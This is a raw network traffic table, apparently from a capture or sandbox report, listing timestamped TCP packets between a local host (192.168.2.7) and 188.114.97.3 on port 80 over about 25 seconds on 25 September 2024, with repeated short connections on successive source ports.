Sep 25, 2024 10:19:25.286429882 CEST	80	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:25.286542892 CEST	49720	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:25.287679911 CEST	80	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:25.287727118 CEST	49720	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:25.291419029 CEST	80	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:25.427680016 CEST	49723	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:25.432470083 CEST	80	49723	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:25.432543993 CEST	49723	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:25.434835911 CEST	49723	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:25.439635992 CEST	80	49723	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:25.439699888 CEST	49723	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:25.750916958 CEST	49723	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:25.772332907 CEST	80	49723	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:25.772342920 CEST	80	49723	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:27.092124939 CEST	80	49723	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:27.092250109 CEST	49723	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:27.092381001 CEST	80	49723	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:27.092430115 CEST	49723	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:27.096966028 CEST	80	49723	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:27.249926090 CEST	49724	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:27.254779100 CEST	80	49724	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:27.254873991 CEST	49724	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:27.264889956 CEST	49724	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:27.269690990 CEST	80	49724	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:27.269752026 CEST	49724	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:27.274604082 CEST	80	49724	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.045062065 CEST	80	49724	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.045170069 CEST	80	49724	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.045178890 CEST	80	49724	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.045248032 CEST	49724	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:28.045300007 CEST	49724	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:28.050244093 CEST	80	49724	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.194688082 CEST	49725	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:28.199611902 CEST	80	49725	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.199721098 CEST	49725	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:28.201822996 CEST	49725	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:28.206696033 CEST	80	49725	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.206792116 CEST	49725	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:28.211632013 CEST	80	49725	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.881432056 CEST	80	49725	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.881453037 CEST	80	49725	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:28.881607056 CEST	49725	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:28.881707907 CEST	49725	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:28.886614084 CEST	80	49725	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.024842024 CEST	49726	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.029851913 CEST	80	49726	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.029992104 CEST	49726	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.032421112 CEST	49726	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.037648916 CEST	80	49726	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.037708998 CEST	49726	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.042552948 CEST	80	49726	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.680705070 CEST	80	49726	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.680830002 CEST	49726	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.680926085 CEST	80	49726	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.680974007 CEST	49726	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.685693026 CEST	80	49726	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.834279060 CEST	49727	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.839567900 CEST	80	49727	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.839720011 CEST	49727	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.841895103 CEST	49727	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.847790003 CEST	80	49727	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:29.847887993 CEST	49727	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:29.854187965 CEST	80	49727	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:30.582844019 CEST	80	49727	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:30.583035946 CEST	49727	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:30.583301067 CEST	80	49727	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:30.583350897 CEST	49727	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:30.588201046 CEST	80	49727	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:30.721790075 CEST	49728	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:30.726567030 CEST	80	49728	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:30.726639032 CEST	49728	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:30.729020119 CEST	49728	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:30.733782053 CEST	80	49728	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:30.733825922 CEST	49728	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:30.738929033 CEST	80	49728	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:31.368978024 CEST	80	49728	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:31.369529963 CEST	80	49728	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:31.369595051 CEST	49728	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:31.396070004 CEST	49728	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:31.401029110 CEST	80	49728	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:31.676364899 CEST	49729	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:31.825206995 CEST	80	49729	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:31.825351000 CEST	49729	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:31.827506065 CEST	49729	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:32.177676916 CEST	80	49729	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:32.177777052 CEST	49729	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:32.182627916 CEST	80	49729	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:32.827177048 CEST	80	49729	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:32.827325106 CEST	49729	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:32.827673912 CEST	80	49729	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:32.827721119 CEST	49729	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:32.832107067 CEST	80	49729	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:32.977761030 CEST	49730	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:32.982677937 CEST	80	49730	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:32.982810974 CEST	49730	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:32.984972954 CEST	49730	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:32.989762068 CEST	80	49730	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:32.989856958 CEST	49730	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:32.994616985 CEST	80	49730	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:33.627873898 CEST	80	49730	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:33.628048897 CEST	49730	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:33.628175020 CEST	80	49730	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:33.628223896 CEST	49730	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:33.633464098 CEST	80	49730	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:33.788007975 CEST	49731	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:33.792865992 CEST	80	49731	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:33.793019056 CEST	49731	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:33.795108080 CEST	49731	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:33.799936056 CEST	80	49731	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:33.800026894 CEST	49731	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:33.807378054 CEST	80	49731	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:34.467776060 CEST	80	49731	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:34.467992067 CEST	49731	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:34.468106031 CEST	80	49731	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:34.468153000 CEST	49731	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:34.472796917 CEST	80	49731	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:34.616683006 CEST	49732	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:34.622673988 CEST	80	49732	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:34.622786999 CEST	49732	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:34.624982119 CEST	49732	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:34.631084919 CEST	80	49732	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:34.631186962 CEST	49732	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:34.635951996 CEST	80	49732	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:35.317949057 CEST	80	49732	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:35.318074942 CEST	49732	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:35.318500042 CEST	80	49732	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:35.318546057 CEST	49732	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:35.322923899 CEST	80	49732	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:35.470660925 CEST	49733	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:35.475594044 CEST	80	49733	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:35.475667000 CEST	49733	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:35.477791071 CEST	49733	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:35.482611895 CEST	80	49733	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:35.482686996 CEST	49733	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:35.487493038 CEST	80	49733	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:36.366451025 CEST	80	49733	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:36.366610050 CEST	49733	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:36.367718935 CEST	80	49733	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:36.367772102 CEST	49733	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:36.371521950 CEST	80	49733	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:36.525017977 CEST	49734	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:36.530296087 CEST	80	49734	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:36.530464888 CEST	49734	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:36.532704115 CEST	49734	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:36.537594080 CEST	80	49734	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:36.537688017 CEST	49734	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:36.542469978 CEST	80	49734	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:37.190291882 CEST	80	49734	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:37.190466881 CEST	49734	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:37.191462994 CEST	80	49734	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:37.191515923 CEST	49734	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:37.195298910 CEST	80	49734	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:37.337724924 CEST	49735	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:37.345993042 CEST	80	49735	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:37.346075058 CEST	49735	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:37.348566055 CEST	49735	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:37.356004953 CEST	80	49735	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:37.356070042 CEST	49735	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:37.364672899 CEST	80	49735	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:38.140223980 CEST	80	49735	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:38.140429974 CEST	49735	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:38.140805006 CEST	80	49735	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:38.140866995 CEST	49735	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:38.145205975 CEST	80	49735	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:38.287704945 CEST	49736	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:39.232584000 CEST	80	49736	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:39.232650995 CEST	49736	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:39.235093117 CEST	49736	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:39.239820004 CEST	80	49736	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:39.239881039 CEST	49736	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:39.244704962 CEST	80	49736	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:39.901659966 CEST	80	49736	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:39.901799917 CEST	80	49736	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:39.901885033 CEST	49736	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:39.902307034 CEST	49736	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:39.906709909 CEST	80	49736	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.062381029 CEST	49737	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.069998026 CEST	80	49737	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.070142031 CEST	49737	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.072299957 CEST	49737	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.078548908 CEST	80	49737	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.078686953 CEST	49737	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.084846020 CEST	80	49737	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.752322912 CEST	80	49737	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.752516031 CEST	49737	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.753087997 CEST	80	49737	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.753137112 CEST	49737	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.757426023 CEST	80	49737	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.897531986 CEST	49738	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.903255939 CEST	80	49738	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.903460026 CEST	49738	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.905690908 CEST	49738	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.911381006 CEST	80	49738	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:40.911451101 CEST	49738	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:40.917090893 CEST	80	49738	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:41.579946041 CEST	80	49738	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:41.580058098 CEST	49738	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:41.580075026 CEST	80	49738	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:41.580118895 CEST	49738	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:41.586004972 CEST	80	49738	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:41.723059893 CEST	49739	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:41.728354931 CEST	80	49739	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:41.728496075 CEST	49739	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:41.730624914 CEST	49739	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:41.735479116 CEST	80	49739	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:41.735559940 CEST	49739	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:41.741059065 CEST	80	49739	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:42.413814068 CEST	80	49739	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:42.413834095 CEST	80	49739	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:42.413942099 CEST	49739	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:42.413981915 CEST	49739	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:42.418948889 CEST	80	49739	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:42.558470011 CEST	49740	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:42.563361883 CEST	80	49740	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:42.563489914 CEST	49740	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:42.565653086 CEST	49740	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:42.570638895 CEST	80	49740	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:42.570719957 CEST	49740	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:42.575511932 CEST	80	49740	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:43.241015911 CEST	80	49740	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:43.241112947 CEST	80	49740	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:43.241127968 CEST	49740	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:43.241158962 CEST	49740	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:43.246416092 CEST	80	49740	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:43.383935928 CEST	49741	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:43.390463114 CEST	80	49741	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:43.390544891 CEST	49741	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:43.392992973 CEST	49741	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:43.399802923 CEST	80	49741	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:43.399884939 CEST	49741	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:43.405540943 CEST	80	49741	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.027549982 CEST	80	49741	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.027787924 CEST	49741	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:44.027820110 CEST	80	49741	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.027915001 CEST	49741	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:44.032597065 CEST	80	49741	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.178639889 CEST	49742	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:44.183588028 CEST	80	49742	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.183722019 CEST	49742	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:44.185964108 CEST	49742	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:44.190819979 CEST	80	49742	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.190956116 CEST	49742	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:44.196773052 CEST	80	49742	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.852020025 CEST	80	49742	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.852238894 CEST	49742	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:44.852570057 CEST	80	49742	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:44.852642059 CEST	49742	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:44.857234001 CEST	80	49742	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.004328012 CEST	49743	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.009592056 CEST	80	49743	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.009705067 CEST	49743	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.011918068 CEST	49743	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.016716957 CEST	80	49743	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.016788960 CEST	49743	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.021563053 CEST	80	49743	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.666337013 CEST	80	49743	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.666426897 CEST	49743	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.666753054 CEST	80	49743	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.666800022 CEST	49743	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.671293020 CEST	80	49743	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.816442966 CEST	49744	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.821449041 CEST	80	49744	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.821676970 CEST	49744	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.823864937 CEST	49744	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.828651905 CEST	80	49744	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:45.828744888 CEST	49744	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:45.833647966 CEST	80	49744	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:46.545284986 CEST	80	49744	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:46.545471907 CEST	49744	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:46.545574903 CEST	80	49744	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:46.545643091 CEST	49744	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:46.551465034 CEST	80	49744	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:46.699840069 CEST	49745	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:46.704660892 CEST	80	49745	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:46.704757929 CEST	49745	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:46.706866026 CEST	49745	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:46.711643934 CEST	80	49745	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:46.711711884 CEST	49745	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:46.716521025 CEST	80	49745	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:47.442342997 CEST	80	49745	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:47.442358971 CEST	80	49745	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:47.442426920 CEST	49745	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:47.442451954 CEST	80	49745	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:47.442490101 CEST	49745	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:47.447756052 CEST	80	49745	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:47.581069946 CEST	49746	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:47.585891008 CEST	80	49746	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:47.585978031 CEST	49746	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:47.588154078 CEST	49746	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:47.595316887 CEST	80	49746	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:47.595407009 CEST	49746	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:47.600233078 CEST	80	49746	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:48.276973009 CEST	80	49746	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:48.277146101 CEST	49746	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:48.277904034 CEST	80	49746	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:48.277961016 CEST	49746	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:48.282001019 CEST	80	49746	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:48.425143003 CEST	49747	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:48.429965019 CEST	80	49747	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:48.430049896 CEST	49747	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:48.432363987 CEST	49747	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:48.437269926 CEST	80	49747	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:48.437320948 CEST	49747	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:48.442161083 CEST	80	49747	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.076529980 CEST	80	49747	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.076735973 CEST	49747	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:49.077385902 CEST	80	49747	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.077481031 CEST	49747	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:49.081572056 CEST	80	49747	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.221776962 CEST	49748	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:49.226634979 CEST	80	49748	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.226722956 CEST	49748	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:49.228828907 CEST	49748	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:49.234637976 CEST	80	49748	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.234721899 CEST	49748	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:49.241332054 CEST	80	49748	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.885318041 CEST	80	49748	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.885437965 CEST	49748	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:49.885584116 CEST	80	49748	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:49.885636091 CEST	49748	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:49.890229940 CEST	80	49748	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:50.033509016 CEST	49749	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.038467884 CEST	80	49749	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:50.038557053 CEST	49749	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.040664911 CEST	49749	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.049174070 CEST	80	49749	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:50.049266100 CEST	49749	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.054066896 CEST	80	49749	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:50.708355904 CEST	80	49749	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:50.708564997 CEST	49749	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.708842993 CEST	80	49749	188.114.97.3	192.168.2.7
Sep 25, 2024 10:19:50.708894968 CEST	49749	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:19:50.713444948 CEST	80	49749	188.114.97.3	192.168.2.7
